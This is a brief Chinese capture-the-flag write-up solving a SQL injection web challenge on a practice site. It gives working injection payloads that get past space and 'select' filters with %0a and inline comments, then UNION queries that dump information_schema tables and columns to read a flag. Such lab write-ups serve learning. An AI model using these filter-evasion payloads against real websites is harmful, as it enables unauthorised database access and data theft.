題目地址：http://ctf5.shiyanbar.com/web/index_2.php

嘗試提交'or '1

簡(jiǎn)單地試一下，發(fā)現(xiàn)空格被吃掉了，那就提交'or'1

成功爆出數(shù)據(jù)，簡(jiǎn)單地測(cè)試之后發(fā)現(xiàn)select和)也被吃掉了，嘗試?yán)@過(guò)select過(guò)濾的時(shí)候發(fā)現(xiàn)：

大小寫(xiě)無(wú)法繞過(guò)、%0aselect%0a無(wú)法繞過(guò)，/**/select/**/和/*!select*/可以繞過(guò)

由于無(wú)法使用)，所以我們無(wú)法使用函數(shù)，報(bào)錯(cuò)和database()都無(wú)法使用，無(wú)法獲取數(shù)據(jù)庫(kù)名，但是我們可以嘗試將所有的時(shí)間表都爆出來(lái)。（當(dāng)然你也可以使用limit一條條來(lái)）

提交'union/*!select*/table_name%0afrom%0ainformation_schema.tables%23，在底部看到flag表

接下來(lái)就是獲取列名，提交'union/*!select*/column_name%0afrom%0ainformation_schema.columns%0awhere%0atable_name='flag'%23

獲取字段名，最后selec出flag

getflag

the end